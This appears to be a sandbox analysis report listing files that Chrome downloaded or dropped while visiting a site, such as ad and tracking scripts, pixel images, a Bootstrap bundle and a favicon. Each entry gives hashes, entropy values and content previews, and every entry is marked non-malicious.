                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function aa(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=m,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b};const ba=(new Date("2024-01-01T00:00:00Z")).getTime(); .function ca(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c} .function da(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function ea(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):15406
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9650904047414803
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:vqjLLciHMHlbQo4Sy9S6IXl2qsl+PlBaEK4NySkc:vqrsH+Xj9NYocT2Skc
                                                                                                                                                                                                                                                                                                                      MD5:59382DD7DA8079DD45A8748ABDBBC76B
                                                                                                                                                                                                                                                                                                                      SHA1:508364D967AAA97168C5E1801CC24D0DA9C24D1E
                                                                                                                                                                                                                                                                                                                      SHA-256:DD8B5FBD942B954BF9AB87579DB1092B0AEBCBA2D5B31ABC68918A11341FF333
                                                                                                                                                                                                                                                                                                                      SHA-512:C681FBD11D3D89B97C53D62D2A2399098808BF56DE32B4D5395B5002CF3287A6B2ED04E5FB94A18F60585678FE211480F893B420B95B7FDFEC3D234E67493325
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://trksyln.net/favicon.ico
                                                                                                                                                                                                                                                                                                                      Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .........................fff....~................................................~fff....z...........................................................z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|......
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65299)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):78743
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.178440533196338
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:tp+1ZTPR2t4tXbih05ve8/pwgrEpc9t0vSAIAxCs:MFRIpk0vSAV
                                                                                                                                                                                                                                                                                                                      MD5:0AA8D64E726C4A57ADB5C88F9115996B
                                                                                                                                                                                                                                                                                                                      SHA1:901169527507FF9E662CF64D8E361F359308970D
                                                                                                                                                                                                                                                                                                                      SHA-256:7E1F1503DF765CCA5E099891B94E318A2EF95081BA2AF1EB6D417CC884BFDBFE
                                                                                                                                                                                                                                                                                                                      SHA-512:EF6583F7684BB3B4F91405E7DEF90D65F9561BAA609540C3A66F3B4DE4267D283C2A7AF298BD86DF447B6ACE05993C2182EF47EDE4B30C25F79A38AD49E70A9F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t={find:(t,e=document.documentElement)=>[].concat(...Element.prototype.querySelectorAll.call(e,t)),findOne:(t,e=document.documentElement)=>Element.prototype.querySelector.call(e,t),children:(t,e)=>[].concat(...t.children).filter(t=>t.matches(e)),parents(t,e){const i=[];let n=t.parentNode;for(;n&&n.nodeType===Node.ELEMENT_NODE&&3!==n.nodeType;)n.matches(e)&&i.push(n),n=n.parentNode;return i},prev(t,e){let i=t.previousElementSibling;for(;i;){if(i.matches(e))return[i];i=i.previousElementSibling}return[]},next(t,e){let i=
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=pulsepoint_inc_&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9&google_hm=Y1VBN2hoMGE3N1Zr
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2015)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):23719
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.515306985771955
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:New8QJ1nMHy/58vrKEOAWXitfX/DfLSqyuBzjZRUVhwiRA5dob91tJ42hr7Vj2uX:New8QJ1nMS/Y4AYit/7fLbxzjchwiRAM
                                                                                                                                                                                                                                                                                                                      MD5:43DBAFE0B9556A5D5EBAEE169037D65A
                                                                                                                                                                                                                                                                                                                      SHA1:F9AD5C86F6A05BDB6C623C1B77FAFB035B7EEA16
                                                                                                                                                                                                                                                                                                                      SHA-256:50F0D3269F54E343C4F8496EF3393D35F067D51C0E9E8319DF18317C86F5E0BC
                                                                                                                                                                                                                                                                                                                      SHA-512:2327C663DA73961E1755EDA1221426D79122AD32499D0CA9EFAD096E24CAA4EC63AC3AF9B1DC0E3B0A30D1D4696AD78A262BE014594A75F2DCF7F66B6B6F1D08
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function ea(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function fa(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=fa;return p.apply(null,arguments)};function ha(a){n.setTimeout(()=>{t
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2015)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):23719
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.515306985771955
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:New8QJ1nMHy/58vrKEOAWXitfX/DfLSqyuBzjZRUVhwiRA5dob91tJ42hr7Vj2uX:New8QJ1nMS/Y4AYit/7fLbxzjchwiRAM
                                                                                                                                                                                                                                                                                                                      MD5:43DBAFE0B9556A5D5EBAEE169037D65A
                                                                                                                                                                                                                                                                                                                      SHA1:F9AD5C86F6A05BDB6C623C1B77FAFB035B7EEA16
                                                                                                                                                                                                                                                                                                                      SHA-256:50F0D3269F54E343C4F8496EF3393D35F067D51C0E9E8319DF18317C86F5E0BC
                                                                                                                                                                                                                                                                                                                      SHA-512:2327C663DA73961E1755EDA1221426D79122AD32499D0CA9EFAD096E24CAA4EC63AC3AF9B1DC0E3B0A30D1D4696AD78A262BE014594A75F2DCF7F66B6B6F1D08
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/elements/html/interstitial_ad_frame_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function ea(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}ea("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function fa(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=fa;return p.apply(null,arguments)};function ha(a){n.setTimeout(()=>{t
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 582 x 659, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):32541
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.8986843298880665
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:HyAPP5SK4z6GuQJcr2wd8eRdklPypMF/xP:SCqhqkAMfP
                                                                                                                                                                                                                                                                                                                      MD5:E5FDD25728A3E56C4C6E0A34C6D3299B
                                                                                                                                                                                                                                                                                                                      SHA1:FEEDF942ACD4DF17892941430FECB7D7D2E9BD32
                                                                                                                                                                                                                                                                                                                      SHA-256:02A3F526611C46135D089B1BC090986E8E0AB359CBBA247A6EBBFF026D114510
                                                                                                                                                                                                                                                                                                                      SHA-512:C56D5E7AE76436492CE98A22EAC85DF9D507CA12162CC7D80D0AF864E2200DCEBE41AFEED22DCB3D0666433CBD8500B5333598BD3C0CD3B28B543EFB4D12C7A4
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...F.................sRGB.......~.IDATx....N.a..Q*X@..`Kj.5j.=....p!..6....qf=...d..z.$I.$I.$I.$I.$I....Z...@.....#.@....|.#. %#..}`......*..g...A:>.;........0..`...`k.....@...a.#j.=....W?.A4..p.&.4L......n9..p..a..@2...QT..h3...9.?.,..y...Z..Y...p*CiT..q......B4)ch.?."....o......:`....^.m\...4./H.QC.1..+...E~.e....6..........cz..x.7.:o.2o...i}=...0j@.F.z.~..>'n.Kx..t...@..f..#....$..a...2.AH..A..k.$".7..."Q....s..'sP..u.......E.._p........A.|.<...g.[....`....8.......HgJ..x..<..lp..pd.S8a0.`6.E.p..#"".R..|..gp...p.........-:..0.z....t.....x..x...`.[....I.....O[d.+..z....x-....fR..P(H6..\.'.LF........R.T$.LJ4..@ ..X,&.t...k......_..~....`...,...[#...9...0.U.KCDD...HF....Ei4...td8.J..^.'.rY......}.5BQ<..p8,.Ph.`...%..H*.2..!..B.~ .....\..{..[#.5:....E`..]/......d".v[J..t.].N.........Z-#D.n".0B.....9........8......l.F.%sY6.-......].i..1:..B...&F...Wp.nE'l..."C..[.QF...IC.6.-.h.d........I.......m.I>..s.s..=......JRJ..+r.|D..]..Qd
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):17030
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.017399633914369
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:W8cqkuVleaFS4YUOQ430RpPd2IV7jSjbQ7u3Ow:W8cNuZeLQPLFV3uTOw
                                                                                                                                                                                                                                                                                                                      MD5:DEA3CCD94090845CA5847A31242A381B
                                                                                                                                                                                                                                                                                                                      SHA1:590DCF0DBE4B58BA6CE77A3405E4E1B18E8C5245
                                                                                                                                                                                                                                                                                                                      SHA-256:6AD677FC1D78C1ED82A4B73DB5D1918BEAB3BD81BB2826E199DEBF0C039D7EB6
                                                                                                                                                                                                                                                                                                                      SHA-512:63DA4FEC84576379EF0238B20E3F6644C908310C5D37FBBEBB0AE7C47A6599763BF3A48DAC90D883A610177AA0AA87CCB5EF525DD716DF92D0971B7437E2195C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env
                                                                                                                                                                                                                                                                                                                      Preview:{"sodar_query_id":"O8ojZ-7CJv6TjuwPwabtmQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flR1OXTppYSO9cFV9KNYCoh+b0SaPEdvMS/Qbts3+yTlsRUQHMG4zY89Oh2k8sxDzmyJXObj0RP855b6PVjq8tDKohQ1S0EyjN0neJ5UZHxhwl6QkUX0+ETr29WmpxwzsQjKiUvhoBvQM1pfaK7dbqfs6cCa8yBWPOL6ivho8iUFAAXGPPxgXoahLcJ/i/tLytYTnjVn9+cXocjTgLvdppx145peG6CCM16c6vyvhLYK2JCiaGZz4hZcbAIFqzWUh0oOrlg9WPD9UlpZPnk7uKp0qpn86HiYGCcczOu9RZJ45A+OXBVZoIl6oulj9+5XAT0mS3vQu57NZrkyNbrVcD7HJauxbXJ/XOha691rG7Nh0yx7WjAonMUBLhvHeZojwNvwuZNjfClhmtxo+Zs4uz0rCFxYXmoJJpJCtqymLyxttCBirZVJDROc1r4kmjmccnBoG+1VTtAdUhVMMkA9ktILimNeQGgszEgX8oKSAJpkYSjQK1IEjpUEGRPnOfC0t5eakoyJ9yI+ooGJpy0JxaBhDASzDMK7a2khHeYNpObnjaHS34GhwtzAWenfN2efOP3wDPVlnBSUwC5KksP3m3eQevFvx5xWRujePye700/FtbCzs5HQr7Jr4s5mW/De0p8+qXemGt+p2uzfFLG1VQSP7owN+ECkRkU9OvtbRFLW4edc8KqxStvbkOmOY15N8xUxnQgOUM/g9SeXMw0VG0unzi99wCBqTCw/kKJeY32//5mlyrXJwbprlOrA+n7rAAl2sw7WS4UndHcXrQ6V8URtHnztSCVqQ94ju58NCkaa4ShroZdMQXjS+c1kiq0D0BTLp6G1AgEBUSEM7
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=stackadapt_usd&google_hm=_yhf8n8vXnl46QBoNdb48K3--k0&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_hm=YXRLd0JjZ2JBMU9lM25FcE44b2padw%3D%3D&google_nid=appier&google_push=AXcoOmShjhS5Zm_KHdaSXn-tCaCec1PeOGYmFvMPaZw78-IGK5FuaDdsBtdMrEqHY8thTWQB4xiS0bgu4ObwjjQPC6YJu2ETGeb0RCZc
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (16325)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):421812
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.63732372716147
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:O4RGTFh5GLgB40oQAzWRSR9cM8rT/r2+GUZ9Or24Avl:XRiFh6c40oQ6WGmYC
                                                                                                                                                                                                                                                                                                                      MD5:A77368F741790ACA5E1C272150BC8D48
                                                                                                                                                                                                                                                                                                                      SHA1:520A397DB79EBB0915C2E769B15110341588BAB8
                                                                                                                                                                                                                                                                                                                      SHA-256:4FCC9FBCFB1F6E4B8FCBFECDC51FA069DC8767BD06D2AAA3182F34C76DA7036E
                                                                                                                                                                                                                                                                                                                      SHA-512:6236D7662E3DA9BE5D12604FA7A17FC054DA215F0529327059F9050F3083F31DFB74858875B98F1FDBBB0CF4A4728EA8A228475F23335F18051130639231B925
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=G-JH2MNQ1WXY
                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1560)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):1775
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0855295906697
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
                                                                                                                                                                                                                                                                                                                      MD5:A5A0C9048EFB7CB5DF90023064D09BA4
                                                                                                                                                                                                                                                                                                                      SHA1:9669B2608D986D4742DD2C0C114B148B6CDB5CDE
                                                                                                                                                                                                                                                                                                                      SHA-256:DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
                                                                                                                                                                                                                                                                                                                      SHA-512:97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-font-face.min.css?token=8ce76d2187
